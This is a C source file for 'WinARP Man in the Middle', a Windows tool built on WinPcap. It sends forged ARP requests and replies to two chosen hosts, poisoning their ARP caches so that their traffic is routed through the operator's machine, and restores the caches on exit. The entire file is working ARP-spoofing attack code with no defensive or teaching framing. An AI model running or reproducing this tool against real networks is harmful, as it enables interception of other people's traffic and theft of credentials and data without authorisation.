/*
 * WinARP Man Inthe Middle
 *
 * It requires WinPcap (http://winpcap.polito.it/)
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include "packet32.h"
#include "winarp_mim.h"
#include "winpcap_common.h"
#include "getopt.h"
#include "Ntddndis.h"



/* Main Program */
int main(int argc, char *argv[])
{
  /* getopt */
  extern char  *optarg;
  register int opt;
      
  /* WinPcap */
  LPADAPTER lpAdapter = 0;
  LPPACKET  lpPacket_a;
  LPPACKET  lpPacket_b;

  /* ARP Packet */
  struct arp_packet arp_pkt_a;
  struct arp_packet arp_pkt_b;

  /* Ethernet & ARP packet */    
  unsigned char	ethersource[ETH_ADD_LEN];
  
  /* Target A */ 
  unsigned char	etherdesta[ETH_ADD_LEN];
  unsigned char	ipdesta[ARP_IP_ADD_SPACE];

  /* Target B */
  unsigned char	etherdestb[ETH_ADD_LEN];
  unsigned char	ipdestb[ARP_IP_ADD_SPACE];      
  
  /* Flags */  
  int flag_delay = 0;
  int flag_count = 0;    
  int flag_ipaddr_a = 0;
  int flag_ipaddr_b = 0;
  int flag_verbose = 0;
  
  /* Others */
  unsigned int tmpaddr[6];  
  int          delay = 2000;
  int          count = -1;  
  int          packetcount = 0;
  int          i;


  /* Get options */ 
  while((opt = getopt(argc, argv, "vha:b:t:c:")) != EOF) {
    switch(opt) {     
     /* Verbose */    	
      case 'v' :
		flag_verbose = 1;
		break;

      /* Help */    	
      case 'h' :
		usage(argv[0]);

        exit(EXIT_SUCCESS);      

      /* Number of packets to send */
      case 'c' :
		if ((count = atoi(optarg)) <= 0) {
			usage(argv[0]);

			exit(EXIT_FAILURE);
		}

		flag_count = 1;
        break;

      /* Delay between packets */
      case 't' :
		delay = atoi(optarg);
		flag_delay = 1;
        break;

      /* Target A IP address */
      case 'a' :
        if ((strlen(optarg) < 7) || (strlen(optarg) > 15)) {
          usage(argv[0]);

          exit(EXIT_FAILURE);
        }
            
        sscanf(optarg, "%d.%d.%d.%d", 
	       &tmpaddr[0], &tmpaddr[1], &tmpaddr[2], 
	       &tmpaddr[3]);
	       
        for (i = 0; i < 4; i++) {
          ipdesta[i] = (unsigned char)tmpaddr[i]; 
        }
        
		flag_ipaddr_a = 1;
        memset(tmpaddr, 0, sizeof(tmpaddr));
        break;
      
      /* Target B IP address */
      case 'b' :
        if ((strlen(optarg) < 7) || (strlen(optarg) > 15)) {
          usage(argv[0]);

          exit(EXIT_FAILURE);
        }
            
        sscanf(optarg, "%d.%d.%d.%d", 
	       &tmpaddr[0], &tmpaddr[1], &tmpaddr[2], 
	       &tmpaddr[3]);
	       
        for (i = 0; i < 4; i++) {
          ipdestb[i] = (unsigned char)tmpaddr[i]; 
        }
        
		flag_ipaddr_b = 1;
        memset(tmpaddr, 0, sizeof(tmpaddr));
        break;      
	}
  }
  
  /* Check options */
  if((flag_ipaddr_a&&flag_ipaddr_b) != 1) {
    usage(argv[0]);

	exit(EXIT_FAILURE);
  }

  /* Open adapter */
  if(open_adapter(&lpAdapter) == EXIT_FAILURE) {
    exit(EXIT_FAILURE);
  }

  /* Get local ethernet source address */
  get_ether_addr(lpAdapter, ethersource);     
  
  /* Get A ethernet destination address */
  if(get_remote_mac(lpAdapter, ipdesta, etherdesta, 0) == EXIT_FAILURE) {
    exit(EXIT_FAILURE);	
  }  

  /* Get B ethernet destination address */
  if(get_remote_mac(lpAdapter, ipdestb, etherdestb, 0) == EXIT_FAILURE) {
    exit(EXIT_FAILURE);	
  }  

  /* Send the 2 first packets with ARP request method */
  /* Init packet A structure */
  memset(&arp_pkt_a, 0, sizeof(struct arp_packet));         

  /* Init packet B structure */
  memset(&arp_pkt_b, 0, sizeof(struct arp_packet));         

  /* Build custom ARP packet A */
  arp_build(&arp_pkt_a, etherdesta, ethersource, ARP_OP_REQUEST, ethersource, ipdestb, etherdesta, ipdesta);     
 
  /* Build custom ARP packet B */
  arp_build(&arp_pkt_b, etherdestb, ethersource, ARP_OP_REQUEST, ethersource, ipdesta, etherdestb, ipdestb);     

  /* Print start informations */
  printf("\n+ Sending 1 ARP REQUEST packet for each target\n");

  if(flag_verbose == 1) {
    print_start(etherdesta, ethersource, ARP_OP_REQUEST, ethersource, ipdestb, etherdesta, ipdesta);
    print_start(etherdestb, ethersource, ARP_OP_REQUEST, ethersource, ipdesta, etherdestb, ipdestb);
  }

  packetcount = packetcount + 2;
  
  /* Send the 2 requests */
  if(twin_send_arp(lpAdapter, &arp_pkt_a, &arp_pkt_b) == EXIT_FAILURE) {
    exit(EXIT_FAILURE);	
  }


  /* Keep the ARP table of targets up to date with ARP reply */
  /* Init packet A structure */
  memset(&arp_pkt_a, 0, sizeof(struct arp_packet));         

  /* Init packet B structure */
  memset(&arp_pkt_b, 0, sizeof(struct arp_packet));         

  /* Build custom ARP packet A */
  arp_build(&arp_pkt_a, etherdesta, ethersource, ARP_OP_REPLY, ethersource, ipdestb, etherdesta, ipdesta);     
 
  /* Build custom ARP packet B */
  arp_build(&arp_pkt_b, etherdestb, ethersource, ARP_OP_REPLY, ethersource, ipdesta, etherdestb, ipdestb);     
 
  /* Init packets */
  if(init_packet(lpAdapter, &lpPacket_a, &arp_pkt_a) == EXIT_FAILURE) {
    exit(EXIT_FAILURE);
  }
  
  if(init_packet(lpAdapter, &lpPacket_b, &arp_pkt_b) == EXIT_FAILURE) {
    exit(EXIT_FAILURE);
  }
  	
  /* Set number of packets to send */
  if(PacketSetNumWrites(lpAdapter, 1) == FALSE) {
    fprintf(stderr, "\nWarning : unable to send more than one packet in a single write\n");
  }

  /* Print start informations */
  if(flag_count == 0) {
    printf("\n+ Sending ARP REPLY packets for each target\n");
  }
  else {
    printf("\n+ Sending %d ARP REPLY packets for each target\n", count);
  }

  if(flag_verbose == 1) {
    print_start(etherdesta, ethersource, ARP_OP_REPLY, ethersource, ipdestb, etherdesta, ipdesta);
    print_start(etherdestb, ethersource, ARP_OP_REPLY, ethersource, ipdesta, etherdestb, ipdestb);
  }
  
  /* Send packet */    
  printf("\n  + Start sending\n");
  printf("    ");  

  while(1){
    if(PacketSendPacket(lpAdapter, lpPacket_a, TRUE) == FALSE){
      fprintf(stderr, "\nError : unable to send the packets\n");	        
      PacketFreePacket(lpPacket_a);
      PacketFreePacket(lpPacket_b);
	  PacketCloseAdapter(lpAdapter);

      exit(EXIT_FAILURE);
	}
  
	printf(".");
	packetcount++;

	if(((packetcount - 2) % 40) == 0) {
      printf("\n    ");
	}

    if(PacketSendPacket(lpAdapter, lpPacket_b, TRUE) == FALSE){
      fprintf(stderr, "\nError : unable to send the packets\n");	              
	  PacketFreePacket(lpPacket_a);
      PacketFreePacket(lpPacket_b);
	  PacketCloseAdapter(lpAdapter);

      exit(EXIT_FAILURE);
	}
  
	printf(".");
	packetcount++;

	if(((packetcount - 2) % 40) == 0) {
      printf("\n    ");
	}

	Sleep(delay);

	if (count > 0) {
	  count--;
	  if( !((count != 0) && (count != -1)) ) {	
        PacketFreePacket(lpPacket_a);
		PacketFreePacket(lpPacket_b);
        printf("\n  + End sending\n");

		/* Send the 2 last packets with ARP reply method to restore initial arp table of targets */
        /* Init packet A structure */
        memset(&arp_pkt_a, 0, sizeof(struct arp_packet));         

        /* Init packet B structure */
        memset(&arp_pkt_b, 0, sizeof(struct arp_packet));         

        /* Build custom ARP packet A */
        arp_build(&arp_pkt_a, etherdesta, ethersource, ARP_OP_REPLY, etherdestb, ipdestb, etherdesta, ipdesta);     
 
        /* Build custom ARP packet B */
        arp_build(&arp_pkt_b, etherdestb, ethersource, ARP_OP_REPLY, etherdesta, ipdesta, etherdestb, ipdestb);     

		printf("\n+ Sending 1 ARP REPLY packet for each target\n");

		if(flag_verbose == 1) {
          print_start(etherdesta, ethersource, ARP_OP_REPLY, etherdestb, ipdestb, etherdesta, ipdesta);         
          print_start(etherdestb, ethersource, ARP_OP_REPLY, etherdesta, ipdesta, etherdestb, ipdestb);        
		}

        /* Send the 2 requests */
        if(twin_send_arp(lpAdapter, &arp_pkt_a, &arp_pkt_b) == EXIT_FAILURE) {
          exit(EXIT_FAILURE);	
		}

		packetcount = packetcount + 2;

	    PacketFreePacket(lpPacket_a);
	    PacketFreePacket(lpPacket_b);
		close_adapter(lpAdapter);

		/* Print statistics */
        statistics(packetcount);

        exit(EXIT_SUCCESS);        
	  }

	}	

	if(_kbhit()) {
	  PacketFreePacket(lpPacket_a);
	  PacketFreePacket(lpPacket_b);	  
      printf("\n  + End sending\n");

	  /* Send the 2 last packets with ARP reply method to restore initial arp table of targets */
      /* Init packet A structure */
      memset(&arp_pkt_a, 0, sizeof(struct arp_packet));         

      /* Init packet B structure */
      memset(&arp_pkt_b, 0, sizeof(struct arp_packet));         

      /* Build custom ARP packet A */
      arp_build(&arp_pkt_a, etherdesta, ethersource, ARP_OP_REPLY, etherdestb, ipdestb, etherdesta, ipdesta);     
 
      /* Build custom ARP packet B */
      arp_build(&arp_pkt_b, etherdestb, ethersource, ARP_OP_REPLY, etherdesta, ipdesta, etherdestb, ipdestb);     
 
	  printf("\n+ Sending 1 ARP REPLY packet for each target\n");

	  if(flag_verbose == 1) {
        print_start(etherdesta, ethersource, ARP_OP_REPLY, etherdestb, ipdestb, etherdesta, ipdesta);
        print_start(etherdestb, ethersource, ARP_OP_REPLY, etherdesta, ipdesta, etherdestb, ipdestb);
	  }

      /* Send the 2 requests */
      if(twin_send_arp(lpAdapter, &arp_pkt_a, &arp_pkt_b) == EXIT_FAILURE) {
        exit(EXIT_FAILURE);	
      }

	  packetcount = packetcount + 2;

	  PacketFreePacket(lpPacket_a);
	  PacketFreePacket(lpPacket_b);

	  close_adapter(lpAdapter);
      
	  /* Print statistics */
      statistics(packetcount);	  

	  exit(EXIT_SUCCESS);
	}
  }
  
  return(EXIT_SUCCESS);
}


int arp_build(struct arp_packet *arp_pkt, unsigned char *dst_etheraddr, 
			  unsigned char *src_etheraddr, int ar_op, unsigned char *ar_sha, 
			  unsigned char *ar_sip, unsigned char *ar_tha, unsigned char *ar_tip) 
{  
  /* Set ethernet header */
  memcpy(&(arp_pkt->eth_dst_addr), dst_etheraddr, ETH_ADD_LEN);      
  memcpy(&(arp_pkt->eth_src_addr), src_etheraddr, ETH_ADD_LEN);
  arp_pkt->eth_type = htons(ETH_TYPE_ARP);  

  /* Set ARP header */
  arp_pkt->ar_hrd = htons(ARP_HW_ETH);
  arp_pkt->ar_pro = htons(ARP_PRO_IP);
  arp_pkt->ar_hln = ARP_ETH_ADD_SPACE;
  arp_pkt->ar_pln = ARP_IP_ADD_SPACE;
  arp_pkt->ar_op  = htons(ar_op);

  memcpy(&(arp_pkt->ar_sha), ar_sha, ARP_ETH_ADD_SPACE);
  memcpy(&(arp_pkt->ar_spa), ar_sip, ARP_IP_ADD_SPACE);
  memcpy(&(arp_pkt->ar_tha), ar_tha, ARP_ETH_ADD_SPACE);
  memcpy(&(arp_pkt->ar_tpa), ar_tip, ARP_IP_ADD_SPACE);
	
  /* Set ethernet padding */
  memset(arp_pkt->eth_pad, 32, ETH_PADDING_ARP);

  return(EXIT_SUCCESS);
}


void usage(char *name) 
{
  printf("WinARP Man in the Middle version %s\n", RELEASE_VERSION);
  printf("\nusage: %s -a target_a_ip -b target_b_ip [-t delay] [-c count] [-v]\n\n", name);	
    
  printf("Options:\n");
  printf("  -a  IP address of target A\n");
  printf("  -b  IP address of target B\n");
  printf("\n");
  
  printf("Misc. options:\n");
  printf("  -c  number of packets to send [infinity]\n");
  printf("  -t  time between successive packets in ms [2000 ms]\n");    
  printf("  -h  help\n");
  printf("  -v  verbose\n");
  printf("\n");  
}


void get_ether_addr(LPADAPTER lpAdapter, unsigned char *ether_addr) 
{ 
  /* Variables */
  ULONG            IoCtlBufferLength = (sizeof(PACKET_OID_DATA) + sizeof(ULONG) - 1);
  PPACKET_OID_DATA OidData;


  /* Memory allocation for PACKET_OID_DATA structure */
  OidData = (struct _PACKET_OID_DATA *)malloc(IoCtlBufferLength);

  /* Set Oid to indicate our query */
  OidData->Oid = OID_802_3_CURRENT_ADDRESS;
  OidData->Length = 6;

  /* Query the adapter for his MAC address */    
  if(PacketRequest(lpAdapter, FALSE, OidData) == FALSE) {
	if((ether_addr) == NULL) {
      printf("\n+ Ethernet address of adapter : 00-00-00-00-00-00\n");     
	}
	else {
     memcpy(ether_addr, 0, 6);	  
	 printf("\n");
	}	
  }
  else {    	  
	if((ether_addr) == NULL) {
      printf("\n+ Ethernet address of adapter : %02X-%02X-%02X-%02X-%02X-%02X\n",
            (OidData->Data)[0], (OidData->Data)[1], (OidData->Data)[2],
		    (OidData->Data)[3], (OidData->Data)[4], (OidData->Data)[5]);
	}
	else {	  
      memcpy(ether_addr, OidData->Data, 6);	  
	}
  } 

  /* Free buffer */
  free(OidData);
}


void print_start(unsigned char *dst_etheraddr, unsigned char *src_etheraddr, 
              int ar_op, unsigned char *ar_sha, unsigned char *ar_sip,
              unsigned char *ar_tha, unsigned char *ar_tip) 
{
  /* Print Ethernet header informations */
  printf("\n  + ETH - Destination MAC : %02X-%02X-%02X-%02X-%02X-%02X\n", 
	      dst_etheraddr[0], dst_etheraddr[1], dst_etheraddr[2], 
	      dst_etheraddr[3], dst_etheraddr[4], dst_etheraddr[5]);	
 
  printf("  + ETH - Source MAC      : %02X-%02X-%02X-%02X-%02X-%02X\n", 
	      src_etheraddr[0], src_etheraddr[1], src_etheraddr[2], 
	      src_etheraddr[3], src_etheraddr[4], src_etheraddr[5]);		  
  
  /* Print ARP informations */
  if (ar_op == 1) {
    printf("  + ARP - ARP Request\n");
  }
  else {
    printf("  + ARP - ARP Reply\n");
  }
  
  printf("  + ARP - Sender MAC address : %02X-%02X-%02X-%02X-%02X-%02X\n", 
	      ar_sha[0], ar_sha[1], ar_sha[2], 
	      ar_sha[3], ar_sha[4], ar_sha[5]);	
          
  printf("  + ARP - Sender IP address  : %d.%d.%d.%d\n", 
	       ar_sip[0], ar_sip[1], ar_sip[2], 
	       ar_sip[3]);


  printf("  + ARP - Target MAC address : %02X-%02X-%02X-%02X-%02X-%02X\n", 
	      ar_tha[0], ar_tha[1], ar_tha[2], 
	      ar_tha[3], ar_tha[4], ar_tha[5]);	

  printf("  + ARP - Target IP address  : %d.%d.%d.%d\n", 
	       ar_tip[0], ar_tip[1], ar_tip[2], 
	       ar_tip[3]);
}


void statistics(int count)
{
  printf("\n+ Statistics\n");
  printf("\n  + %d packets transmitted (each: %d bytes - total: %d bytes)\n", count, sizeof(struct arp_packet), count * sizeof(struct arp_packet));
}


int get_remote_mac(LPADAPTER lpAdapter, unsigned char *iptarget, unsigned char *remotemac, int mode)
{
  /* WinPcap */
  LPPACKET lpPacketRequest;
  LPPACKET lpPacketReply;
  char     buffer[256000];

  /* Packet */
  struct arp_packet arp_pkt;
  unsigned char broadcast[ETH_ADD_LEN];
  unsigned char macsender[ARP_ETH_ADD_SPACE];  
  unsigned char mactarget[ARP_ETH_ADD_SPACE];
  unsigned char	ipsender[ARP_IP_ADD_SPACE];  

  /* Others */
  int send_ok = 0;
  DWORD timestamp = 0;


  /* Init fields */
  memset(broadcast, 0xFF, 6);
  memset(mactarget, 0, 6);  
  get_ether_addr(lpAdapter, macsender);
  get_ip_addr(ipsender);
  
  /* Allocate PACKET structure for ARP Request packet */
  if((lpPacketRequest = PacketAllocatePacket()) == NULL) {
    fprintf(stderr, "\nError : failed to allocate the LPPACKET structure.\n");

    return(EXIT_FAILURE);
  }  

  /* Init packet structure */
  memset(&arp_pkt, 0, sizeof(struct arp_packet));          

  /* Build ARP Request packet */
  arp_build(&arp_pkt, broadcast, macsender, ARP_OP_REQUEST, macsender, ipsender, mactarget, iptarget);     
 
  /* Init ARP Request packet */
  PacketInitPacket(lpPacketRequest, &arp_pkt, sizeof(arp_pkt));
		
  /* Set number of ARP Request packets to send */
  if(PacketSetNumWrites(lpAdapter, 1) == FALSE) {
    fprintf(stderr, "\nWarning : unable to send more than one packet in a single write.\n");
  }
   	  

  /* Set hardware filter to directed mode */
  if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_DIRECTED) == FALSE){
    printf("\nWarning: unable to set directed mode.\n");	
  }

  /* Set a 512K buffer in the driver */
  if(PacketSetBuff(lpAdapter, 512000) == FALSE){
    printf("\nError: unable to set the kernel buffer.\n");
	PacketFreePacket(lpPacketRequest);

	return(EXIT_FAILURE);
  }

  /* Set a 1 second read timeout */
  if(PacketSetReadTimeout(lpAdapter, -1) == FALSE){
    printf("\nWarning: unable to set the read tiemout.\n");
  }
  
  /* Allocate PACKET structure for ARP Reply packet */
  if((lpPacketReply = PacketAllocatePacket()) == NULL){
    printf("\nError: failed to allocate the LPPACKET structure.\n");
	PacketFreePacket(lpPacketRequest);

	return(EXIT_FAILURE);
  }
  
  /* Init ARP Reply packet */
  PacketInitPacket(lpPacketReply, (char*)buffer, 256000);

  /* Allocate memory for remote MAC address */
  if(mode == 1) {
    remotemac = (unsigned char*)malloc(sizeof(unsigned char) * 6);
  }

  timestamp = GetTickCount();

  /* Main capture loop */
  while(1) {
    if(send_ok != 1) {
	  /* Send packet */    
      if(PacketSendPacket(lpAdapter, lpPacketRequest, TRUE) == FALSE) {
        fprintf(stderr, "\nError : unable to send the packets.\n");	                
        PacketFreePacket(lpPacketRequest);
		PacketFreePacket(lpPacketReply);

		return(EXIT_FAILURE);
	  }

      /* Free packet */
      PacketFreePacket(lpPacketRequest);
      send_ok = 1;
	}
  
    /* Capture the packets */
	if(PacketReceivePacket(lpAdapter, lpPacketReply, TRUE) == FALSE) {
	  printf("\nError: PacketReceivePacket failed.\n");      
	  PacketFreePacket(lpPacketReply);

	  return(EXIT_FAILURE);
	}
    	
    if(lpPacketReply->ulBytesReceived > 0) {  
	  if(read_arp_reply(lpPacketReply, iptarget, remotemac) == EXIT_SUCCESS) {
		
		if(mode == 1) {
          printf("\n+ Sender IP address  : %d.%d.%d.%d\n", 
	            iptarget[0], iptarget[1], iptarget[2], iptarget[3]);    
    	  	
	      printf("+ Sender MAC address : %02X-%02X-%02X-%02X-%02X-%02X\n", 
	            remotemac [0], remotemac [1], remotemac [2], 
	            remotemac [3], remotemac [4], remotemac [5]);
      
	      printf("\n");
		}
	  
	    break;
	  }
	}	

	if((GetTickCount() - timestamp) > 2000) {
      printf("\nError: unable to get MAC address from %d.%d.%d.%d\n", 
	            iptarget[0], iptarget[1], iptarget[2], iptarget[3]);    

	  return(EXIT_FAILURE);
	}
  }

  if(mode == 1) {
	  free(remotemac);
  }

  /* Free packet */
  PacketFreePacket(lpPacketReply);  

  return(EXIT_SUCCESS);
}


int read_arp_reply(LPPACKET lpPacket, unsigned char *iptarget, unsigned char *result)
{
  /* Variables */    
  unsigned short int ether_type;
  unsigned char      ipsender[4];   
  unsigned int       off=0;
  unsigned int       tlen, tlen1;      
  struct bpf_hdr     *hdr;		
  char	             *pChar;
  char	             *buf;
  

  /* Initialization */  
  off = 0;

  /* Init buffer with packet data */
  buf = (char *)lpPacket->Buffer;		
  
  /* Read packet */	
  hdr = (struct bpf_hdr *)(buf + off);
  tlen1 = hdr->bh_datalen;
  tlen = hdr->bh_caplen;
  off += hdr->bh_hdrlen;	  
  pChar = (char*)(buf + off);	
  off = Packet_WORDALIGN(off + tlen);
	    
  /* Read Ethernet type */
  memcpy(&ether_type, pChar + 12, 2); 
  ether_type = ntohs(ether_type);  

  if(ether_type == ETH_TYPE_ARP) {
    /* Copy ip address of sender */
    memcpy(ipsender, pChar + 28, 4);	  	

    if((iptarget[0] == ipsender[0])&&(iptarget[1] == ipsender[1])&&
       (iptarget[2] == ipsender[2])&&(iptarget[3] == ipsender[3])) {
     
      /* Copy MAC address of sender */
      memcpy(result, pChar + 22, 6);		        
	}
    else {

      return(EXIT_FAILURE);
	}  
  }
  else {

    return(EXIT_FAILURE);
  }

  return(EXIT_SUCCESS);
} 


int get_ip_addr(unsigned char *ip_addr)
{
  /* Winsock */
  WORD		    wVersionRequested; 
  WSADATA		wsaData; 
 
  /* Others */
  char           hostname[256];
  struct hostent *info;
  unsigned char  ipaddr[4];
 

  wVersionRequested = MAKEWORD(1, 1); 
  if(WSAStartup(wVersionRequested, &wsaData) != 0) {
    fprintf(stderr, "\nError: unable to start WinSock\n");

    return(EXIT_FAILURE);
  }

  if(gethostname(hostname, 256) == SOCKET_ERROR) {
    fprintf(stderr, "\nError: unable to get ip address\n");
    WSACleanup();

    return(EXIT_FAILURE);
  }

  if((info = gethostbyname(hostname)) != NULL) {
	memcpy(ipaddr, (unsigned char *)(*info->h_addr_list), 4);
	if(ip_addr != NULL) {
      memcpy(ip_addr, ipaddr, 4);
	}
	else {
	  printf("\n+ IP address : %d.%d.%d.%d\n", 
	         ipaddr[0], ipaddr[1], ipaddr[2], ipaddr[3]);	
	}
  }
  else {
    fprintf(stderr, "\nError: unable to get ip address\n");
    WSACleanup();

    return(EXIT_FAILURE);
  }

  WSACleanup();

  return(EXIT_SUCCESS);
}


int init_packet(LPADAPTER lpAdapter, LPPACKET *lpPacket, struct arp_packet *arp_pkt)
{
  /* Allocate PACKET structure */
  if((*lpPacket = PacketAllocatePacket()) == NULL) {
    fprintf(stderr, "\nError : failed to allocate the LPPACKET structure");
    PacketCloseAdapter(lpAdapter);

    return(EXIT_FAILURE);
  }    
  
  /* Init packet */
  PacketInitPacket(*lpPacket, arp_pkt, sizeof(*arp_pkt));
	
  /* Set number of packets to send */
  if(PacketSetNumWrites(lpAdapter, 1) == FALSE) {
    fprintf(stderr, "\nWarning : unable to send more than one packet in a single write\n");
  }
 
  return(EXIT_SUCCESS);
}

int twin_send_arp(LPADAPTER lpAdapter, struct arp_packet *arp_pkt_a, 
				 struct arp_packet *arp_pkt_b)
{
  /* Packets */
  LPPACKET  lpPacket_a;
  LPPACKET  lpPacket_b;  

  /* Init the 2 packets */
  init_packet(lpAdapter, &lpPacket_a, arp_pkt_a);
  init_packet(lpAdapter, &lpPacket_b, arp_pkt_b);

  /* Set number of packets to send */
  if(PacketSetNumWrites(lpAdapter, 1) == FALSE) {
    fprintf(stderr, "\nWarning : unable to send more than one packet in a single write\n");
  }

  if(PacketSendPacket(lpAdapter, lpPacket_a, TRUE) == FALSE){
    fprintf(stderr, "\nError : unable to send the packets\n");	        
    PacketFreePacket(lpPacket_a);
    PacketFreePacket(lpPacket_b);
    PacketCloseAdapter(lpAdapter);

    return(EXIT_FAILURE);
  }
  
  if(PacketSendPacket(lpAdapter, lpPacket_b, TRUE) == FALSE){
    fprintf(stderr, "\nError : unable to send the packets\n");	              
    PacketFreePacket(lpPacket_a);
    PacketFreePacket(lpPacket_b);
	PacketCloseAdapter(lpAdapter);

    return(EXIT_FAILURE);
  }

  PacketFreePacket(lpPacket_a);
  PacketFreePacket(lpPacket_b);

  return(EXIT_SUCCESS);
}

